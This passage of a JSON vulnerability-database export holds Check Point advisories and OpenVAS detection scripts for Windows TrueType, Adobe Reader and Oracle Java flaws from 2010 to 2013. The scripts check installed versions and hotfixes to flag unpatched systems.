"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:51:05", "description": "A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper bounds checking when parsing specially crafted TrueType Font (TTF) files. A remote attacker may exploit this vulnerability by enticing an affected user to open a specially crafted TTF file. 
Successful exploitation of this vulnerability may allow execution of arbitrary code on a target system or lead to a local elevation of privilege condition.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows TrueType Font File Parsing Code Execution - Ver2 (CVE-2011-3402)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0735", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:31:17", "description": "A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper bounds checking when parsing specially crafted TrueType Font (TTF) files. A remote attacker may exploit this vulnerability by enticing an affected user to open a specially crafted TTF file. 
Successful exploitation of this vulnerability may allow execution of arbitrary code on a target system or lead to a local elevation of privilege condition.", "cvss3": {}, "published": "2011-11-06T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows TrueType Font File Parsing Code Execution (CVE-2011-3402)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2014-11-25T00:00:00", "id": "CPAI-2011-512", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:45:43", "description": "A buffer overflow vulnerability has been reported in the way Adobe Acrobat. The vulnerability is due to a boundary checks error while parsing crafted PDF documents. A remote attacker could exploit this vulnerability by enticing target users to open a malicious PDF document in a vulnerable version of the affected applications. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {}, "published": "2014-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Reader Libtiff TIFFFetchShortPair Stack Buffer Overflow - Ver2 (CVE-2010-0188)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188"], "modified": "2014-03-31T00:00:00", "id": "CPAI-2014-1119", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:33:54", "description": "A stack overflow vulnerability has been reported in Adobe Acrobat and Reader. The vulnerability is due to an error in Adobe Acrobat and Reader while parsing a specially crafted PDF file. 
A remote attacker can exploit this issue by enticing a victim to open a specially crafted PDF file.", "cvss3": {}, "published": "2010-05-16T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Reader Libtiff TIFFFetchShortPair Stack Buffer Overflow (APSB10-07; CVE-2010-0188)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188"], "modified": "2017-01-09T00:00:00", "id": "CPAI-2010-370", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:13:26", "description": "BlackHole is a web exploit kit that operates by delivering malicious payload to the victim's computer. Remote attackers can infect users with BlackHole by enticing them to visit a malicious web page. 
Successful infection will allow the attacker to download additional malware to the target.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "BlackHole Toolkit v2 JAVA Payload Stage Code Execution (CVE-2012-0507; CVE-2012-1723; CVE-2013-0422; CVE-2013-0431; CVE-2013-1493)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-1493"], "modified": "2017-03-01T00:00:00", "id": "CPAI-2013-3486", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:12:44", "description": "A code execution vulnerability has been reported in Oracle Java. The vulnerability is due to an access control failure in the com.sun.jmx.mbeanserver package and in the invokeWithArguments() method of the java.lang.invoke.MethodHandle class. A remote attacker could trigger this vulnerability by using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object then retrieving arbitrary Class references using the findClass method and using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-01-07T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java MBeanInstantiator.findClass Remote Code Execution - Ver2 (CVE-2013-0422)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2014-01-07T00:00:00", "id": "CPAI-2014-0023", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:51:36", "description": "A code execution vulnerability has been reported in Oracle Java. The vulnerability is due to an access control failure in the com.sun.jmx.mbeanserver package and in the invokeWithArguments() method of the java.lang.invoke.MethodHandle class. A remote attacker could trigger this vulnerability by using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object then retrieving arbitrary Class references using the findClass method and using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java MBeanInstantiator.findClass Remote Code Execution - Ver2 (CVE-2013-0422)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0833", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:13:44", "description": "Two vulnerabilities have been reported in Oracle Java that can be used to breach the security sandbox. The first vulnerability is due to an access control failure in the com.sun.jmx.mbeanserver package. The second vulnerability is due to an access control failure in the invokeWithArguments() method of the java.lang.invoke.MethodHandle class.", "cvss3": {}, "published": "2013-01-13T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java JmxMBeanServer Package Sandbox Breach (CVE-2013-0422)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2016-08-17T00:00:00", "id": "CPAI-2013-007", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:03:27", "description": "A remote code execution vulnerability exists in Oracle Java.", "cvss3": {}, "published": "2013-05-05T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java Final Field Overwrite (CVE-2013-2423)", "bulletinFamily": 
"info", "cvss2": {}, "cvelist": ["CVE-2013-2423"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-1714", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:15:55", "description": "An unknown vulnerability has been reported in Java Runtime Environment. The vulnerability is due to unknown vectors related to HotSpot. A remote attacker can exploit this issue by enticing a target user to view a specially crafted web page.", "cvss3": {}, "published": "2013-04-28T00:00:00", "type": "checkpoint_advisories", "title": "Java Applet Reflection Type Confusion Remote Code Execution (CVE-2013-2423)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2423"], "modified": "2013-11-07T00:00:00", "id": "CPAI-2013-1685", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-17T12:16:06", "description": "A stack buffer overflow vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to insufficient validation of the 'count' property of the 'curveType' object in the CMM module of the Oracle JVM. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious Java applet with a vulnerable application. 
Successful exploitation can lead to arbitrary code execution on a target system.", "cvss3": {}, "published": "2013-03-10T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java Runtime CMM Code Execution (CVE-2013-1493)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1493"], "modified": "2013-10-21T00:00:00", "id": "CPAI-2013-1345", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:50:24", "description": "New exploits were released for several remote code execution vulnerabilities that were discovered in the way Adobe Acrobat Reader and Foxit Reader handle specially crafted PDF files. 
Although various security products provide coverage against many malformed PDF files vulnerabilities, these new exploits could potentially bypass security products by using PDF files that contain obfuscated JavaScript code.", "cvss3": {}, "published": "2015-02-24T00:00:00", "type": "checkpoint_advisories", "title": "PDF Containing Obfuscated JavaScript Code (CVE-2010-0188; CVE-2010-2883)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188", "CVE-2010-2883"], "modified": "2015-04-29T00:00:00", "id": "CPAI-2015-0221", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-07T16:39:04", "description": "The host is installed with Microsoft Windows operating system and is prone to\n pivilege escalation vulnerability.\n\n This VT has been replaced by OID:1.3.6.1.4.1.25623.1.0.902767.", "cvss3": {}, "published": "2011-11-07T00:00:00", "type": "openvas", "title": "Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310802500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802500", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 
Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802500\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)\");\n script_name(\"Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2639658\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2011/2639658\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code with\n kernel-level privileges. 
Failed exploit attempts may result in a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 Service Pack 1 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\n\n - Microsoft Windows server 2003 Service Pack 2 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to due to an error within the Win32k kernel-mode\n driver when parsing TrueType fonts.\");\n\n script_tag(name:\"solution\", value:\"Apply the workaround.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Microsoft Windows operating system and is prone to\n pivilege escalation vulnerability.\n\n This VT has been replaced by OID:1.3.6.1.4.1.25623.1.0.902767.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-087.nasl\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-09T11:14:13", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-087.", "cvss3": {}, "published": "2011-12-14T00:00:00", "type": "openvas", "title": "Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2018-02-08T00:00:00", "id": "OPENVAS:902767", "href": "http://plugins.openvas.org/nasl.php?oid=902767", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-087.nasl 8724 2018-02-08 15:02:56Z cfischer $\n#\n# Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2639417)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# 
Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow local attackers to run arbitrary code in\n kernel mode and take complete control of an affected system. An attacker\n could then install programs view, change, or delete data or create new\n accounts with full administrative rights.\n\n Impact Level: System\";\ntag_affected = \"Microsoft Windows 7 Service Pack 1 and prior\n\n Microsoft Windows XP Service Pack 3 and prior\n\n Microsoft Windows 2003 Service Pack 2 and prior\n\n Microsoft Windows Vista Service Pack 2 and prior\n\n Microsoft Windows Server 2008 Service Pack 2 and prior\";\ntag_insight = \"The flaw is due to to an error within the Win32k kernel-mode driver\n (win32k.sys) when parsing TrueType fonts.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n\n http://technet.microsoft.com/en-us/security/bulletin/ms11-087\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS11-087.\";\n\nif(description)\n{\n script_id(902767);\n script_version(\"$Revision: 8724 $\");\n script_cve_id(\"CVE-2011-3402\");\n 
script_bugtraq_id(50462);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-08 16:02:56 +0100 (Thu, 08 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-14 09:28:44 +0530 (Wed, 14 Dec 2011)\");\n script_name(\"Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)\");\n script_xref(name : \"URL\" , value : \"https://secunia.com/advisories/46724/\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2639417\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms11-087\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## MS11-087 Hotfix (2639417)\nif(hotfix_missing(name:\"2639417\") == 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\n## Get Version from Win32k.sys file\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Win32k.sys\");\nif(!sysVer){\n exit(0);\n}\n\n## Windows 
XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Check for Win32k.sys version before 5.1.2600.6178\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6178\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Win32k.sys version before 5.2.3790.4938\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4938\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## File Information is not available for Windows Vista and Server 2008\n## Applied the patch and taking upgraded version as non vuln\n## Checking for only GDR\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Win32k.sys version\n if(version_in_range(version:sysVer, test_version:\"6.0.6002.18000\", test_version2:\"6.0.6002.18543\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Win32k.sys version\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16920\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7600.20000\", test_version2:\"6.1.7600.21096\")||\n version_in_range(version:sysVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17729\")||\n version_in_range(version:sysVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21865\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:57", "description": "This host is missing a critical security update according 
to\n Microsoft Bulletin MS11-087.", "cvss3": {}, "published": "2011-12-14T00:00:00", "type": "openvas", "title": "Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2020-01-07T00:00:00", "id": "OPENVAS:1361412562310902767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902767", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2639417)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-January/msg00036.html\");\n script_id(870889);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:36:09 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0165-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\");\n\n script_summary(\"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-1693-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], 